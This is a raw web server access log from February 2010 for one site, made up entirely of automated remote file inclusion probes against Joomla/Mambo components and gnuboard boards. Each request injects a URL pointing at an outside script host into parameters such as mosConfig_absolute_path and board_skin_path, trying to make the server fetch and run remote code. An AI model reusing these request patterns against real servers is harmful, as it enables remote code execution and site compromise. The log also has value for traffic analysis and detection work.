210.205.6.233 - - [18/Feb/2010:08:26:45 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:26:46 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:21 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:21 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:21 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:21 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:21 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:21 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:22 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:22 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:22 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:22 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:22 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:22 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:23 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:23 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:27:23 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:27:23 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:27:23 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:23 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:23 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:23 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:24 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:27:24 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:27:24 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:27:25 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:27:32 -0800] "GET /logs/access_100107.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:33 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:33 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:33 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:33 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:27:33 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:33 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:34 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:34 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:34 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:34 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:34 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:27:34 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:27:42 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:27:43 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:27:43 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:28:08 -0800] "GET /logs/access_100129.log///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:30 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:30 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:30 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:31 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:28:34 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:08:28:34 -0800] "GET /logs/access_100129.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:08:28:34 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:08:28:34 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:36 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:36 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:36 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:36 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:28:40 -0800] "GET /bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:28:40 -0800] "GET /logs/access_100126.log//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:28:40 -0800] "GET /logs//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:43 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:28:45 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:28:47 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:08:28:48 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:28:52 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:28:52 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:28:53 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:28:54 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:01 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:01 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:01 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:01 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:01 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:01 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:02 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:02 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:02 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:07 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:08 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:09 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:10 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:10 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:10 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:08:29:10 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:13 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:14 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:15 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:08:29:15 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:29:23 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:29:24 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:29:25 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:27 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:27 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:29:28 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:29:29 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:29:30 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:29:31 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:30:10 -0800] "GET /logs/access_100103.log//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:30:19 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:30:30 -0800] "GET /gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:30:30 -0800] "GET /logs/access_100210.log//gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:30:30 -0800] "GET /logs//gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:30:39 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:31:16 -0800] "GET /logs/access_100109.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:31:16 -0800] "GET /logs/access_100109.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:08:31:20 -0800] "GET /logs/access_100127.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:32:43 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:33:22 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:33:22 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:33:22 -0800] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:33:35 -0800] "GET /logs/access_100126.log%20%20/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:33:47 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:33:55 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:34:23 -0800] "GET /logs//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:34:23 -0800] "GET /bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:34:23 -0800] "GET /logs/access_100126.log//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
